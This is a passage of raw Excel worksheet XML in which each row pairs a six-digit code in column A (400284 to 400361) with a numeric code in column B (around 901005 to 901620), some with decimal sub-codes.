      <c r="B1420" s="3">
        <v>901185</v>
      </c>
    </row>
    <row r="1421" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1421" s="6">
        <v>400284</v>
      </c>
      <c r="B1421" s="3">
        <v>901055</v>
      </c>
    </row>
    <row r="1422" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1422" s="6">
        <v>400284</v>
      </c>
      <c r="B1422" s="3">
        <v>901055.00100000005</v>
      </c>
    </row>
    <row r="1423" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1423" s="6">
        <v>400284</v>
      </c>
      <c r="B1423" s="3">
        <v>901055.00199999998</v>
      </c>
    </row>
    <row r="1424" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1424" s="6">
        <v>400284</v>
      </c>
      <c r="B1424" s="3">
        <v>901055.00300000003</v>
      </c>
    </row>
    <row r="1425" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1425" s="6">
        <v>400284</v>
      </c>
      <c r="B1425" s="3">
        <v>901055.00399999996</v>
      </c>
    </row>
    <row r="1426" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1426" s="6">
        <v>400284</v>
      </c>
      <c r="B1426" s="3">
        <v>901055.005</v>
      </c>
    </row>
    <row r="1427" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1427" s="6">
        <v>400284</v>
      </c>
      <c r="B1427" s="3">
        <v>901055.00800000003</v>
      </c>
    </row>
    <row r="1428" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1428" s="6">
        <v>400284</v>
      </c>
      <c r="B1428" s="3">
        <v>901055.01199999999</v>
      </c>
    </row>
    <row r="1429" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1429" s="6">
        <v>400285</v>
      </c>
      <c r="B1429" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="1430" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1430" s="6">
        <v>400285</v>
      </c>
      <c r="B1430" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1431" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1431" s="6">
        <v>400285</v>
      </c>
      <c r="B1431" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="1432" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1432" s="6">
        <v>400290</v>
      </c>
      <c r="B1432" s="3">
        <v>901053</v>
      </c>
    </row>
    <row r="1433" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1433" s="6">
        <v>400290</v>
      </c>
      <c r="B1433" s="3">
        <v>901053.00100000005</v>
      </c>
    </row>
    <row r="1434" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1434" s="6">
        <v>400290</v>
      </c>
      <c r="B1434" s="3">
        <v>901053.00199999998</v>
      </c>
    </row>
    <row r="1435" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1435" s="6">
        <v>400290</v>
      </c>
      <c r="B1435" s="3">
        <v>901053.00300000003</v>
      </c>
    </row>
    <row r="1436" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1436" s="6">
        <v>400290</v>
      </c>
      <c r="B1436" s="3">
        <v>901053.005</v>
      </c>
    </row>
    <row r="1437" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1437" s="6">
        <v>400290</v>
      </c>
      <c r="B1437" s="3">
        <v>901053.00600000005</v>
      </c>
    </row>
    <row r="1438" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1438" s="6">
        <v>400290</v>
      </c>
      <c r="B1438" s="3">
        <v>901053.00699999998</v>
      </c>
    </row>
    <row r="1439" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1439" s="6">
        <v>400291</v>
      </c>
      <c r="B1439" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1440" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1440" s="6">
        <v>400291</v>
      </c>
      <c r="B1440" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1441" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1441" s="6">
        <v>400292</v>
      </c>
      <c r="B1441" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1442" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1442" s="6">
        <v>400292</v>
      </c>
      <c r="B1442" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1443" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1443" s="6">
        <v>400300</v>
      </c>
      <c r="B1443" s="3">
        <v>901560</v>
      </c>
    </row>
    <row r="1444" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1444" s="6">
        <v>400300</v>
      </c>
      <c r="B1444" s="3">
        <v>901560.00199999998</v>
      </c>
    </row>
    <row r="1445" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1445" s="6">
        <v>400300</v>
      </c>
      <c r="B1445" s="3">
        <v>901560.00300000003</v>
      </c>
    </row>
    <row r="1446" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1446" s="6">
        <v>400300</v>
      </c>
      <c r="B1446" s="3">
        <v>901119</v>
      </c>
    </row>
    <row r="1447" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1447" s="6">
        <v>400300</v>
      </c>
      <c r="B1447" s="3">
        <v>901020</v>
      </c>
    </row>
    <row r="1448" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1448" s="6">
        <v>400300</v>
      </c>
      <c r="B1448" s="3">
        <v>901059</v>
      </c>
    </row>
    <row r="1449" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1449" s="6">
        <v>400300</v>
      </c>
      <c r="B1449" s="3">
        <v>901059.00100000005</v>
      </c>
    </row>
    <row r="1450" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1450" s="6">
        <v>400300</v>
      </c>
      <c r="B1450" s="3">
        <v>901059.005</v>
      </c>
    </row>
    <row r="1451" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1451" s="6">
        <v>400300</v>
      </c>
      <c r="B1451" s="3">
        <v>901059.00699999998</v>
      </c>
    </row>
    <row r="1452" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1452" s="6">
        <v>400300</v>
      </c>
      <c r="B1452" s="3">
        <v>901005</v>
      </c>
    </row>
    <row r="1453" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1453" s="6">
        <v>400300</v>
      </c>
      <c r="B1453" s="3">
        <v>901140</v>
      </c>
    </row>
    <row r="1454" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1454" s="6">
        <v>400300</v>
      </c>
      <c r="B1454" s="3">
        <v>901482</v>
      </c>
    </row>
    <row r="1455" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1455" s="6">
        <v>400300</v>
      </c>
      <c r="B1455" s="3">
        <v>901615</v>
      </c>
    </row>
    <row r="1456" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1456" s="6">
        <v>400300</v>
      </c>
      <c r="B1456" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="1457" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1457" s="6">
        <v>400300</v>
      </c>
      <c r="B1457" s="3">
        <v>901564.00300000003</v>
      </c>
    </row>
    <row r="1458" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1458" s="6">
        <v>400300</v>
      </c>
      <c r="B1458" s="3">
        <v>901564.00699999998</v>
      </c>
    </row>
    <row r="1459" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1459" s="6">
        <v>400300</v>
      </c>
      <c r="B1459" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="1460" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1460" s="6">
        <v>400300</v>
      </c>
      <c r="B1460" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="1461" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1461" s="6">
        <v>400300</v>
      </c>
      <c r="B1461" s="3">
        <v>901056.00199999998</v>
      </c>
    </row>
    <row r="1462" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1462" s="6">
        <v>400300</v>
      </c>
      <c r="B1462" s="3">
        <v>901559</v>
      </c>
    </row>
    <row r="1463" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1463" s="6">
        <v>400300</v>
      </c>
      <c r="B1463" s="3">
        <v>901559.00100000005</v>
      </c>
    </row>
    <row r="1464" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1464" s="6">
        <v>400300</v>
      </c>
      <c r="B1464" s="3">
        <v>901559.00199999998</v>
      </c>
    </row>
    <row r="1465" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1465" s="6">
        <v>400300</v>
      </c>
      <c r="B1465" s="3">
        <v>901620</v>
      </c>
    </row>
    <row r="1466" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1466" s="6">
        <v>400300</v>
      </c>
      <c r="B1466" s="3">
        <v>901216</v>
      </c>
    </row>
    <row r="1467" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1467" s="6">
        <v>400300</v>
      </c>
      <c r="B1467" s="3">
        <v>901216.00100000005</v>
      </c>
    </row>
    <row r="1468" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1468" s="6">
        <v>400300</v>
      </c>
      <c r="B1468" s="3">
        <v>901016</v>
      </c>
    </row>
    <row r="1469" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1469" s="6">
        <v>400310</v>
      </c>
      <c r="B1469" s="3">
        <v>901499</v>
      </c>
    </row>
    <row r="1470" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1470" s="6">
        <v>400310</v>
      </c>
      <c r="B1470" s="3">
        <v>901499.00100000005</v>
      </c>
    </row>
    <row r="1471" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1471" s="6">
        <v>400310</v>
      </c>
      <c r="B1471" s="3">
        <v>901499.00199999998</v>
      </c>
    </row>
    <row r="1472" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1472" s="6">
        <v>400310</v>
      </c>
      <c r="B1472" s="3">
        <v>901499.00300000003</v>
      </c>
    </row>
    <row r="1473" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1473" s="6">
        <v>400310</v>
      </c>
      <c r="B1473" s="3">
        <v>901499.00399999996</v>
      </c>
    </row>
    <row r="1474" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1474" s="6">
        <v>400310</v>
      </c>
      <c r="B1474" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="1475" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1475" s="6">
        <v>400310</v>
      </c>
      <c r="B1475" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1476" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1476" s="6">
        <v>400310</v>
      </c>
      <c r="B1476" s="3">
        <v>901562.00199999998</v>
      </c>
    </row>
    <row r="1477" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1477" s="6">
        <v>400310</v>
      </c>
      <c r="B1477" s="3">
        <v>901562.00300000003</v>
      </c>
    </row>
    <row r="1478" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1478" s="6">
        <v>400310</v>
      </c>
      <c r="B1478" s="3">
        <v>901562.00600000005</v>
      </c>
    </row>
    <row r="1479" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1479" s="6">
        <v>400310</v>
      </c>
      <c r="B1479" s="3">
        <v>901498</v>
      </c>
    </row>
    <row r="1480" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1480" s="6">
        <v>400310</v>
      </c>
      <c r="B1480" s="3">
        <v>901498.00100000005</v>
      </c>
    </row>
    <row r="1481" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1481" s="6">
        <v>400310</v>
      </c>
      <c r="B1481" s="3">
        <v>901498.00199999998</v>
      </c>
    </row>
    <row r="1482" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1482" s="6">
        <v>400310</v>
      </c>
      <c r="B1482" s="3">
        <v>901496</v>
      </c>
    </row>
    <row r="1483" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1483" s="6">
        <v>400310</v>
      </c>
      <c r="B1483" s="3">
        <v>901529</v>
      </c>
    </row>
    <row r="1484" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1484" s="6">
        <v>400320</v>
      </c>
      <c r="B1484" s="3">
        <v>901557</v>
      </c>
    </row>
    <row r="1485" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1485" s="6">
        <v>400320</v>
      </c>
      <c r="B1485" s="3">
        <v>901557.00100000005</v>
      </c>
    </row>
    <row r="1486" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1486" s="6">
        <v>400320</v>
      </c>
      <c r="B1486" s="3">
        <v>901547.01100000006</v>
      </c>
    </row>
    <row r="1487" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1487" s="6">
        <v>400320</v>
      </c>
      <c r="B1487" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="1488" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1488" s="6">
        <v>400320</v>
      </c>
      <c r="B1488" s="3">
        <v>901543.00100000005</v>
      </c>
    </row>
    <row r="1489" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1489" s="6">
        <v>400320</v>
      </c>
      <c r="B1489" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="1490" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1490" s="6">
        <v>400320</v>
      </c>
      <c r="B1490" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1491" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1491" s="6">
        <v>400320</v>
      </c>
      <c r="B1491" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="1492" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1492" s="6">
        <v>400320</v>
      </c>
      <c r="B1492" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="1493" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1493" s="6">
        <v>400320</v>
      </c>
      <c r="B1493" s="3">
        <v>901564.00600000005</v>
      </c>
    </row>
    <row r="1494" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1494" s="6">
        <v>400320</v>
      </c>
      <c r="B1494" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1495" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1495" s="6">
        <v>400320</v>
      </c>
      <c r="B1495" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1496" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1496" s="6">
        <v>400320</v>
      </c>
      <c r="B1496" s="3">
        <v>901569</v>
      </c>
    </row>
    <row r="1497" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1497" s="6">
        <v>400320</v>
      </c>
      <c r="B1497" s="3">
        <v>901569.00100000005</v>
      </c>
    </row>
    <row r="1498" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1498" s="6">
        <v>400320</v>
      </c>
      <c r="B1498" s="3">
        <v>901569.00199999998</v>
      </c>
    </row>
    <row r="1499" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1499" s="6">
        <v>400321</v>
      </c>
      <c r="B1499" s="3">
        <v>901197</v>
      </c>
    </row>
    <row r="1500" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1500" s="6">
        <v>400321</v>
      </c>
      <c r="B1500" s="3">
        <v>901574</v>
      </c>
    </row>
    <row r="1501" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1501" s="6">
        <v>400321</v>
      </c>
      <c r="B1501" s="3">
        <v>901574.005</v>
      </c>
    </row>
    <row r="1502" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1502" s="6">
        <v>400321</v>
      </c>
      <c r="B1502" s="3">
        <v>901574.01</v>
      </c>
    </row>
    <row r="1503" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1503" s="6">
        <v>400321</v>
      </c>
      <c r="B1503" s="3">
        <v>901574.01100000006</v>
      </c>
    </row>
    <row r="1504" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1504" s="6">
        <v>400321</v>
      </c>
      <c r="B1504" s="3">
        <v>901562</v>
      </c>
    </row>
    <row r="1505" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1505" s="6">
        <v>400321</v>
      </c>
      <c r="B1505" s="3">
        <v>901562.00100000005</v>
      </c>
    </row>
    <row r="1506" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1506" s="6">
        <v>400321</v>
      </c>
      <c r="B1506" s="3">
        <v>901490</v>
      </c>
    </row>
    <row r="1507" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1507" s="6">
        <v>400321</v>
      </c>
      <c r="B1507" s="3">
        <v>901036</v>
      </c>
    </row>
    <row r="1508" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1508" s="6">
        <v>400321</v>
      </c>
      <c r="B1508" s="3">
        <v>901036.00399999996</v>
      </c>
    </row>
    <row r="1509" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1509" s="6">
        <v>400321</v>
      </c>
      <c r="B1509" s="3">
        <v>901021.00600000005</v>
      </c>
    </row>
    <row r="1510" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1510" s="6">
        <v>400321</v>
      </c>
      <c r="B1510" s="3">
        <v>901489</v>
      </c>
    </row>
    <row r="1511" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1511" s="6">
        <v>400322</v>
      </c>
      <c r="B1511" s="3">
        <v>901543</v>
      </c>
    </row>
    <row r="1512" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1512" s="6">
        <v>400322</v>
      </c>
      <c r="B1512" s="3">
        <v>901543.00100000005</v>
      </c>
    </row>
    <row r="1513" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1513" s="6">
        <v>400322</v>
      </c>
      <c r="B1513" s="3">
        <v>901543.00199999998</v>
      </c>
    </row>
    <row r="1514" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1514" s="6">
        <v>400322</v>
      </c>
      <c r="B1514" s="3">
        <v>901543.00300000003</v>
      </c>
    </row>
    <row r="1515" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1515" s="6">
        <v>400322</v>
      </c>
      <c r="B1515" s="3">
        <v>901543.00399999996</v>
      </c>
    </row>
    <row r="1516" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1516" s="6">
        <v>400330</v>
      </c>
      <c r="B1516" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="1517" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1517" s="6">
        <v>400330</v>
      </c>
      <c r="B1517" s="3">
        <v>901537</v>
      </c>
    </row>
    <row r="1518" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1518" s="6">
        <v>400331</v>
      </c>
      <c r="B1518" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="1519" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1519" s="6">
        <v>400331</v>
      </c>
      <c r="B1519" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="1520" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1520" s="6">
        <v>400332</v>
      </c>
      <c r="B1520" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="1521" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1521" s="6">
        <v>400333</v>
      </c>
      <c r="B1521" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="1522" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1522" s="6">
        <v>400334</v>
      </c>
      <c r="B1522" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="1523" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1523" s="6">
        <v>400334</v>
      </c>
      <c r="B1523" s="3">
        <v>901537</v>
      </c>
    </row>
    <row r="1524" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1524" s="6">
        <v>400340</v>
      </c>
      <c r="B1524" s="3">
        <v>901110</v>
      </c>
    </row>
    <row r="1525" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1525" s="6">
        <v>400340</v>
      </c>
      <c r="B1525" s="3">
        <v>901110.00100000005</v>
      </c>
    </row>
    <row r="1526" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1526" s="6">
        <v>400340</v>
      </c>
      <c r="B1526" s="3">
        <v>901110.00199999998</v>
      </c>
    </row>
    <row r="1527" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1527" s="6">
        <v>400340</v>
      </c>
      <c r="B1527" s="3">
        <v>901110.00300000003</v>
      </c>
    </row>
    <row r="1528" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1528" s="6">
        <v>400340</v>
      </c>
      <c r="B1528" s="3">
        <v>901110.00399999996</v>
      </c>
    </row>
    <row r="1529" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1529" s="6">
        <v>400340</v>
      </c>
      <c r="B1529" s="3">
        <v>901538</v>
      </c>
    </row>
    <row r="1530" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1530" s="6">
        <v>400340</v>
      </c>
      <c r="B1530" s="3">
        <v>901070</v>
      </c>
    </row>
    <row r="1531" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1531" s="6">
        <v>400340</v>
      </c>
      <c r="B1531" s="3">
        <v>901070.005</v>
      </c>
    </row>
    <row r="1532" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1532" s="6">
        <v>400340</v>
      </c>
      <c r="B1532" s="3">
        <v>901207</v>
      </c>
    </row>
    <row r="1533" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1533" s="6">
        <v>400340</v>
      </c>
      <c r="B1533" s="3">
        <v>901552</v>
      </c>
    </row>
    <row r="1534" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1534" s="6">
        <v>400340</v>
      </c>
      <c r="B1534" s="3">
        <v>901552.005</v>
      </c>
    </row>
    <row r="1535" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1535" s="6">
        <v>400340</v>
      </c>
      <c r="B1535" s="3">
        <v>901552.00699999998</v>
      </c>
    </row>
    <row r="1536" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1536" s="6">
        <v>400340</v>
      </c>
      <c r="B1536" s="3">
        <v>901550</v>
      </c>
    </row>
    <row r="1537" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1537" s="6">
        <v>400340</v>
      </c>
      <c r="B1537" s="3">
        <v>901550.00199999998</v>
      </c>
    </row>
    <row r="1538" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1538" s="6">
        <v>400340</v>
      </c>
      <c r="B1538" s="3">
        <v>901550.00300000003</v>
      </c>
    </row>
    <row r="1539" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1539" s="6">
        <v>400340</v>
      </c>
      <c r="B1539" s="3">
        <v>901078</v>
      </c>
    </row>
    <row r="1540" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1540" s="6">
        <v>400340</v>
      </c>
      <c r="B1540" s="3">
        <v>901078.00100000005</v>
      </c>
    </row>
    <row r="1541" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1541" s="6">
        <v>400340</v>
      </c>
      <c r="B1541" s="3">
        <v>901078.00199999998</v>
      </c>
    </row>
    <row r="1542" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1542" s="6">
        <v>400340</v>
      </c>
      <c r="B1542" s="3">
        <v>901078.00300000003</v>
      </c>
    </row>
    <row r="1543" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1543" s="6">
        <v>400340</v>
      </c>
      <c r="B1543" s="3">
        <v>901078.00399999996</v>
      </c>
    </row>
    <row r="1544" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1544" s="6">
        <v>400341</v>
      </c>
      <c r="B1544" s="3">
        <v>901136</v>
      </c>
    </row>
    <row r="1545" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1545" s="6">
        <v>400341</v>
      </c>
      <c r="B1545" s="3">
        <v>901136.00100000005</v>
      </c>
    </row>
    <row r="1546" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1546" s="6">
        <v>400341</v>
      </c>
      <c r="B1546" s="3">
        <v>901136.00199999998</v>
      </c>
    </row>
    <row r="1547" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1547" s="6">
        <v>400341</v>
      </c>
      <c r="B1547" s="3">
        <v>901136.00300000003</v>
      </c>
    </row>
    <row r="1548" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1548" s="6">
        <v>400341</v>
      </c>
      <c r="B1548" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="1549" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1549" s="6">
        <v>400341</v>
      </c>
      <c r="B1549" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="1550" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1550" s="6">
        <v>400342</v>
      </c>
      <c r="B1550" s="3">
        <v>901531</v>
      </c>
    </row>
    <row r="1551" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1551" s="6">
        <v>400343</v>
      </c>
      <c r="B1551" s="3">
        <v>901134</v>
      </c>
    </row>
    <row r="1552" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1552" s="6">
        <v>400343</v>
      </c>
      <c r="B1552" s="3">
        <v>901134.005</v>
      </c>
    </row>
    <row r="1553" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1553" s="6">
        <v>400343</v>
      </c>
      <c r="B1553" s="3">
        <v>901087</v>
      </c>
    </row>
    <row r="1554" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1554" s="6">
        <v>400343</v>
      </c>
      <c r="B1554" s="3">
        <v>901087.00300000003</v>
      </c>
    </row>
    <row r="1555" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1555" s="6">
        <v>400343</v>
      </c>
      <c r="B1555" s="3">
        <v>901087.00399999996</v>
      </c>
    </row>
    <row r="1556" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1556" s="6">
        <v>400343</v>
      </c>
      <c r="B1556" s="3">
        <v>901564</v>
      </c>
    </row>
    <row r="1557" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1557" s="6">
        <v>400343</v>
      </c>
      <c r="B1557" s="3">
        <v>901564.00199999998</v>
      </c>
    </row>
    <row r="1558" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1558" s="6">
        <v>400343</v>
      </c>
      <c r="B1558" s="3">
        <v>901201</v>
      </c>
    </row>
    <row r="1559" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1559" s="6">
        <v>400344</v>
      </c>
      <c r="B1559" s="3">
        <v>901531</v>
      </c>
    </row>
    <row r="1560" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1560" s="6">
        <v>400344</v>
      </c>
      <c r="B1560" s="3">
        <v>901098</v>
      </c>
    </row>
    <row r="1561" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1561" s="6">
        <v>400344</v>
      </c>
      <c r="B1561" s="3">
        <v>901098.00100000005</v>
      </c>
    </row>
    <row r="1562" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1562" s="6">
        <v>400344</v>
      </c>
      <c r="B1562" s="3">
        <v>901098.00199999998</v>
      </c>
    </row>
    <row r="1563" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1563" s="6">
        <v>400344</v>
      </c>
      <c r="B1563" s="3">
        <v>901098.00300000003</v>
      </c>
    </row>
    <row r="1564" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1564" s="6">
        <v>400344</v>
      </c>
      <c r="B1564" s="3">
        <v>901528</v>
      </c>
    </row>
    <row r="1565" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1565" s="6">
        <v>400350</v>
      </c>
      <c r="B1565" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="1566" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1566" s="6">
        <v>400351</v>
      </c>
      <c r="B1566" s="3">
        <v>901485</v>
      </c>
    </row>
    <row r="1567" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1567" s="6">
        <v>400351</v>
      </c>
      <c r="B1567" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="1568" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1568" s="6">
        <v>400352</v>
      </c>
      <c r="B1568" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="1569" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1569" s="6">
        <v>400353</v>
      </c>
      <c r="B1569" s="3">
        <v>901580</v>
      </c>
    </row>
    <row r="1570" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1570" s="6">
        <v>400354</v>
      </c>
      <c r="B1570" s="3">
        <v>901578</v>
      </c>
    </row>
    <row r="1571" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1571" s="6">
        <v>400360</v>
      </c>
      <c r="B1571" s="3">
        <v>901606</v>
      </c>
    </row>
    <row r="1572" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1572" s="6">
        <v>400360</v>
      </c>
      <c r="B1572" s="3">
        <v>901606.00100000005</v>
      </c>
    </row>
    <row r="1573" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1573" s="6">
        <v>400360</v>
      </c>
      <c r="B1573" s="3">
        <v>901606.00199999998</v>
      </c>
    </row>
    <row r="1574" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1574" s="6">
        <v>400361</v>
      </c>
      <c r="B1574" s="3">
        <v>901606</v>
      </c>
    </row>
    <row r="1575" spans="1:2" x14ac:dyDescent="0.25">
      <c r="A1575" s="6">
        <v>400361</v>
      </c>
      <c r="B1575" s="3">
        <v>901606.00100000005</v>
      </c>
